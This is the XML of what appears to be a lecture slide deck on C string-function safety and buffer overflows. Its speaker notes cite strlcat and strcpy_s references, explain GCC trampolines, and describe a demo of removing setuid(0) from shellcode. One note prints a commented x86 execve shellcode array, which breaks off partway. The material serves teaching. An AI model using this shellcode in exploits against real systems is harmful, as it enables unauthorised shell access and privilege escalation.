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4"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId25"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="310" r:id="rId3"/>
    <p:sldId id="312" r:id="rId4"/>
    <p:sldId id="314" r:id="rId5"/>
    <p:sldId id="313" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="285" r:id="rId8"/>
    <p:sldId id="286" r:id="rId9"/>
    <p:sldId id="319" r:id="rId10"/>
    <p:sldId id="320" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="275" r:id="rId13"/>
    <p:sldId id="315" r:id="rId14"/>
    <p:sldId id="316" r:id="rId15"/>
    <p:sldId id="318" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="279" r:id="rId18"/>
    <p:sldId id="304" r:id="rId19"/>
    <p:sldId id="308" r:id="rId20"/>
    <p:sldId id="280" r:id="rId21"/>
    <p:sldId id="309" r:id="rId22"/>
    <p:sldId id="321" r:id="rId23"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6746875" cy="9913938"/>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99FF"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="00CC66"/>
    <a:srgbClr val="FFFF00"/>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77408" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="1836" y="90"/>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4819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3822700"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34820" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9418638"/>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4821" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3822700" y="9418638"/>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1458E38F-3451-4ED1-98FF-7D566A5C72CA}"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kumimoji="0" sz="1200">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3821113" y="0"/>
            <a:ext cx="2924175"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200">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-12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895350" y="742950"/>
            <a:ext cx="4956175" cy="3717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674688" y="4708525"/>
            <a:ext cx="5397500" cy="44624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4278" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9417050"/>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kumimoji="0" sz="1200">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54279" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3821113" y="9417050"/>
            <a:ext cx="2924175"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200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{940C8AAE-5172-4B06-94E5-A3858A69D94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940C8AAE-5172-4B06-94E5-A3858A69D949}"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b="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675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8856AF4-F651-45D8-8D45-2A8A23B89EA8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>12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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6861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t>Reference: https://eklitzke.org/beware-of-strncpy-and-strncat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6861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E823A5E-C122-4DA6-9E50-90DE90608351}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6861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t>https://www.freebsd.org/cgi/man.cgi?query=strlcpy&amp;sektion=3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(char * restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>, const char * restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dstsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>() appends the NUL-terminated string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> to the end of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>. It will append at most</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>size-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>)-1 bytes, and NUL-terminates the results.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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b="1" dirty="0" smtClean="0"/>
              <a:t>Reference: https://www.openbsd.org/papers/portability.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6861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E823A5E-C122-4DA6-9E50-90DE90608351}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6861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z="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Reference: https://embeddedgurus.com/barr-code/2017/08/cs-strcpy_s-c11s-more-secure-version-of-strcpy/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6861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E823A5E-C122-4DA6-9E50-90DE90608351}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>15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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7065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t>A "trampoline" is a small piece of code that is created at run time when the address of a nested function is taken. It normally resides on the stack, in the stack frame of the containing function. These macros tell GNU CC how to generate code to allocate and initialize a trampoline. The instructions in the trampoline must do two things: load a constant address into the static chain register, and jump to the real address of the nested function. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>http://www.openwall.com/linux/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7066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A45D712-F7A1-4D77-9E44-7B323387FDE3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">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b="0" dirty="0" smtClean="0"/>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47EE9CF-FDE6-492E-891F-FD0F495071F0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>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t>Demo: remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>(0) in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> and try buffer overflow</a:t>
            </a:r>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47EE9CF-FDE6-492E-891F-FD0F495071F0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>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b="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655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F73FBDB-279E-4B95-BAE4-25AC2E30ADC3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>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smtClean="0"/>
              <a:t>For your reference:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>----------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>char shellcode[]=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>\x38"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> 0x38         */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x5e"                          /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>popl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>             */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x80\x46\x01\x50"              /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>addb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> $0x50,0x1(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>)  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x80\x46\x02\x50"              /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>addb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> $0x50,0x2(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>)  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x80\x46\x03\x50"              /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>addb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> $0x50,0x3(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>)  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x80\x46\x05\x50"              /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>addb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> $0x50,0x5(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>)  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x80\x46\x06\x50"              /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>addb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> $0x50,0x6(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>)  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x89\xf0"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi,%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>        */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x83\xc0\x08"                  /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>addl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> $0x8,%eax        */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x89\x46\x08"                  /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> %eax,0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>)   */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x31\xc0"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xorl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>eax,%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>        */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x88\x46\x07"                  /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> %eax,0x7(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>)   */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x89\x46\x0c"                  /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> %eax,0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>)   */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\xb0\x0b"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> $0xb,%al         */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x89\xf3"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi,%ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>        */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x8d\x4e\x08"                  /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> 0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>   */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x8d\x56\x0c"                  /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> 0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>   */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>\x80"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> $0x80             */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>	"\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>"                      /* </a:t>
            </a:r>
            <a:r>
